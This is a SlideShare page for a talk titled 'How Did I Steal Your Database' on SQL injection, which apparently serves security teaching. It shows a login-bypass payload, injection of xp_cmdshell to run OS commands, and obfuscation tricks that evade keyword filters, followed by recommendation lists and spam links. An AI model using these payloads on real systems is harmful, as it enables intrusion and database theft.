SlideShare ist ein Scribd-Unternehmen logo

How Did I Steal Your Database

Als PPTX, PDF herunterladen
Mostafa Siraj
Mostafa Siraj

The session describes some advanced SQL injection techniques

News & PolitikTechnologie
1 von 18
How Did I Steal Your Database Mostafa Siraj @mostafasiraj
Agenda Noooo, it kills suspense
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
SQL Injection What is it? The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.
SQL Injection Example, Bypassing Logon ,[object Object],String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“ ….. ,[object Object],SELECT * FROM user WHERE name = 'Mostafa' AND pass='' OR '1'='1' ,[object Object],[object Object]
MS SQL Server: Execute OS command xp_cmdshell
Set username to '; exec master.dbo.xp_cmdshell "dir";-- producesSELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; -- Note: dir list directory content
Let's play Hide and Seek Original: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; -- Defender: Disallow double quotes: Attacker: SELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell dir; -- Defender: Filter out string “xp_cmdshell” Attacker: ';declare @a varchar(1000); set @a = 'master.dbo.xp_' + 'cmdshell dir'; exec (@a);-- Defender: Filter out “xp”, “cmd”, “shell”, …. Attacker: ';declare @a varchar(1000); set @a = reverse('rid llehsdmc_px.obd.retsam'); exec (@a);--
Finding SQL Injection Bugs
Finding SQL Injection Bugs ,[object Object]
Submit two single quotation and observe the result
Identify the database (e.g.Oracle: ‘||’FOO MS-SQL: ‘+’FOO MySQL: ‘ ‘FOO [note the space btw the 2 quotes]
Finding SQL Injection Bugs ,[object Object]
For search fields try using the wildcard character %,[object Object]
Inject into different statement types ,[object Object]
Watch out when injecting in UPDATE or DELETE,[object Object]
Demo HacmeBank
Demo Using UNION Operator

Empfohlen

SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Laravel Security Standards
Laravel Security Standards Laravel Security Standards
Laravel Security Standards Singsys Pte Ltd
 
Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchElsner Technologies Pvt Ltd
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 

Empfohlen

SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinOWASP Top 10 at International PHP Conference 2014 in Berlin
OWASP Top 10 at International PHP Conference 2014 in BerlinTobias Zander
 
OWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP ProgrammersOWASP TOP 10 for PHP Programmers
OWASP TOP 10 for PHP Programmersrjsmelo
 
Laravel Security Standards
Laravel Security Standards Laravel Security Standards
Laravel Security Standards Singsys Pte Ltd
 
Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchElsner Technologies Pvt Ltd
 
PHP Security
PHP SecurityPHP Security
PHP SecurityMindfire Solutions
 
Php Security
Php SecurityPhp Security
Php Securityguest7cf35c
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure ProgrammingBalavignesh Kasinathan
 
PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
Drupal for ng_os
Drupal for ng_osDrupal for ng_os
Drupal for ng_osdstuartnz
 
Hiding secrets in Vault
Hiding secrets in VaultHiding secrets in Vault
Hiding secrets in VaultNeven Rakonić
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!Taras Oleksyn
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014Amazon Web Services
 
Ruby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayConRuby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayConheikowebers
 
Deep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line InterfaceDeep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line InterfaceAmazon Web Services
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Rakesh Kachhadiya
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Jayasree Veliyath
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...Alex Soto
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platformPegasystems
 
Oracle APEX Performance
Oracle APEX PerformanceOracle APEX Performance
Oracle APEX PerformanceScott Wesley
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전HyungTae Lim
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 

Weitere ähnliche Inhalte

Was ist angesagt?

Drupal for ng_os
Drupal for ng_osDrupal for ng_os
Drupal for ng_osdstuartnz
 
Hiding secrets in Vault
Hiding secrets in VaultHiding secrets in Vault
Hiding secrets in VaultNeven Rakonić
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!Taras Oleksyn
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014Amazon Web Services
 
Ruby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayConRuby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayConheikowebers
 
Deep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line InterfaceDeep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line InterfaceAmazon Web Services
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Rakesh Kachhadiya
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Jayasree Veliyath
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...Alex Soto
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.Josh Hillier
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platformPegasystems
 
Oracle APEX Performance
Oracle APEX PerformanceOracle APEX Performance
Oracle APEX PerformanceScott Wesley
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전HyungTae Lim
 

Was ist angesagt? (20)

Php Security
Php SecurityPhp Security
Php Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
Drupal for ng_os
Drupal for ng_osDrupal for ng_os
Drupal for ng_os
 
Hiding secrets in Vault
Hiding secrets in VaultHiding secrets in Vault
Hiding secrets in Vault
 
SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!SCULPT! YOUR! TESTS!
SCULPT! YOUR! TESTS!
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
(DEV305) Building Apps with the AWS SDK for PHP | AWS re:Invent 2014
 
Ruby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayConRuby on Rails Security Updated (Rails 3) at RailsWayCon
Ruby on Rails Security Updated (Rails 3) at RailsWayCon
 
Deep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line InterfaceDeep Dive: AWS Command Line Interface
Deep Dive: AWS Command Line Interface
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security API
 
Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0Development Security Framework based on Owasp Esapi for JSF2.0
Development Security Framework based on Owasp Esapi for JSF2.0
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
Develop and Deploy your JavaEE micro service in less than 5 minutes with Apac...
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
Make WordPress realtime.
Make WordPress realtime.Make WordPress realtime.
Make WordPress realtime.
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platform
 
Oracle APEX Performance
Oracle APEX PerformanceOracle APEX Performance
Oracle APEX Performance
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
스프링 시큐리티로 시작하는 웹 어플리케이션 보안 _강사준비 스터디 버전
 

Ähnlich wie How Did I Steal Your Database

Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101brian_dailey
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application SecurityMahmud Ahsan
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With PhpJeremy Coates
 

Ähnlich wie How Did I Steal Your Database (20)

Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Asp
AspAsp
Asp
 
Sql injection
Sql injectionSql injection
Sql injection
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
Sql injection
Sql injectionSql injection
Sql injection
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
Exploiting Php With Php
Exploiting Php With PhpExploiting Php With Php
Exploiting Php With Php
 

Kürzlich hochgeladen

2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx
2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx
2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docxkfjstone13
 
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...narsireddynannuri1
 
Pakistan PMLN Election Manifesto 2024.pdf
Pakistan PMLN Election Manifesto 2024.pdfPakistan PMLN Election Manifesto 2024.pdf
Pakistan PMLN Election Manifesto 2024.pdfFahimUddin61
 
Vashi Escorts, {Pooja 09892124323}, Vashi Call Girls
Vashi Escorts, {Pooja 09892124323}, Vashi Call GirlsVashi Escorts, {Pooja 09892124323}, Vashi Call Girls
Vashi Escorts, {Pooja 09892124323}, Vashi Call GirlsPooja Nehwal
 
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...AlexisTorres963861
 
26042024_First India Newspaper Jaipur.pdf
26042024_First India Newspaper Jaipur.pdf26042024_First India Newspaper Jaipur.pdf
26042024_First India Newspaper Jaipur.pdfFIRST INDIA
 
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort ServiceDelhi Call girls
 
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...Ismail Fahmi
 
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover Back
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover BackVerified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover Back
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover BackPsychicRuben LoveSpells
 
Kishan Reddy Report To People (2019-24).pdf
Kishan Reddy Report To People (2019-24).pdfKishan Reddy Report To People (2019-24).pdf
Kishan Reddy Report To People (2019-24).pdfKISHAN REDDY OFFICE
 
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Development
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's DevelopmentNara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Development
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Developmentnarsireddynannuri1
 
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...Diya Sharma
 
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptx
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptxKAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptx
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptxjohnandrewcarlos
 
25042024_First India Newspaper Jaipur.pdf
25042024_First India Newspaper Jaipur.pdf25042024_First India Newspaper Jaipur.pdf
25042024_First India Newspaper Jaipur.pdfFIRST INDIA
 
Roberts Rules Cheat Sheet for LD4 Precinct Commiteemen
Roberts Rules Cheat Sheet for LD4 Precinct CommiteemenRoberts Rules Cheat Sheet for LD4 Precinct Commiteemen
Roberts Rules Cheat Sheet for LD4 Precinct Commiteemenkfjstone13
 
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort ServiceDelhi Call girls
 
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadership
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s LeadershipTDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadership
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadershipanjanibaddipudi1
 
Minto-Morley Reforms 1909 (constitution).pptx
Minto-Morley Reforms 1909 (constitution).pptxMinto-Morley Reforms 1909 (constitution).pptx
Minto-Morley Reforms 1909 (constitution).pptxAwaiskhalid96
 
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docxkfjstone13
 
How Europe Underdeveloped Africa_walter.pdf
How Europe Underdeveloped Africa_walter.pdfHow Europe Underdeveloped Africa_walter.pdf
How Europe Underdeveloped Africa_walter.pdfLorenzo Lemes
 

Kürzlich hochgeladen (20)

2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx
2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx
2024 04 03 AZ GOP LD4 Gen Meeting Minutes FINAL.docx
 
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...
Nurturing Families, Empowering Lives: TDP's Vision for Family Welfare in Andh...
 
Pakistan PMLN Election Manifesto 2024.pdf
Pakistan PMLN Election Manifesto 2024.pdfPakistan PMLN Election Manifesto 2024.pdf
Pakistan PMLN Election Manifesto 2024.pdf
 
Vashi Escorts, {Pooja 09892124323}, Vashi Call Girls
Vashi Escorts, {Pooja 09892124323}, Vashi Call GirlsVashi Escorts, {Pooja 09892124323}, Vashi Call Girls
Vashi Escorts, {Pooja 09892124323}, Vashi Call Girls
 
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...
Defensa de JOH insiste que testimonio de analista de la DEA es falso y solici...
 
26042024_First India Newspaper Jaipur.pdf
26042024_First India Newspaper Jaipur.pdf26042024_First India Newspaper Jaipur.pdf
26042024_First India Newspaper Jaipur.pdf
 
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Rajokri Delhi >༒8448380779 Escort Service
 
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...
HARNESSING AI FOR ENHANCED MEDIA ANALYSIS A CASE STUDY ON CHATGPT AT DRONE EM...
 
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover Back
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover BackVerified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover Back
Verified Love Spells in Little Rock, AR (310) 882-6330 Get My Ex-Lover Back
 
Kishan Reddy Report To People (2019-24).pdf
Kishan Reddy Report To People (2019-24).pdfKishan Reddy Report To People (2019-24).pdf
Kishan Reddy Report To People (2019-24).pdf
 
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Development
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's DevelopmentNara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Development
Nara Chandrababu Naidu's Visionary Policies For Andhra Pradesh's Development
 
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...
₹5.5k {Cash Payment} Independent Greater Noida Call Girls In [Delhi INAYA] 🔝|...
 
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptx
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptxKAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptx
KAHULUGAN AT KAHALAGAHAN NG GAWAING PANSIBIKO.pptx
 
25042024_First India Newspaper Jaipur.pdf
25042024_First India Newspaper Jaipur.pdf25042024_First India Newspaper Jaipur.pdf
25042024_First India Newspaper Jaipur.pdf
 
Roberts Rules Cheat Sheet for LD4 Precinct Commiteemen
Roberts Rules Cheat Sheet for LD4 Precinct CommiteemenRoberts Rules Cheat Sheet for LD4 Precinct Commiteemen
Roberts Rules Cheat Sheet for LD4 Precinct Commiteemen
 
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort ServiceBDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort Service
BDSM⚡Call Girls in Indirapuram Escorts >༒8448380779 Escort Service
 
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadership
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s LeadershipTDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadership
TDP As the Party of Hope For AP Youth Under N Chandrababu Naidu’s Leadership
 
Minto-Morley Reforms 1909 (constitution).pptx
Minto-Morley Reforms 1909 (constitution).pptxMinto-Morley Reforms 1909 (constitution).pptx
Minto-Morley Reforms 1909 (constitution).pptx
 
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx
2024 03 13 AZ GOP LD4 Gen Meeting Minutes_FINAL.docx
 
How Europe Underdeveloped Africa_walter.pdf
How Europe Underdeveloped Africa_walter.pdfHow Europe Underdeveloped Africa_walter.pdf
How Europe Underdeveloped Africa_walter.pdf
 

How Did I Steal Your Database

  • 1. How Did I Steal Your Database Mostafa Siraj @mostafasiraj
  • 2. Agenda Noooo, it kills suspense
  • 3. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
  • 4. SQL Injection What is it? The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query.
  • 5.
  • 6. MS SQL Server: Execute OS command xp_cmdshell
  • 7. Set username to '; exec master.dbo.xp_cmdshell "dir";-- producesSELECT * FROM user WHERE name=''; exec master.dbo.xp_cmdshell "dir"; -- Note: dir list directory content
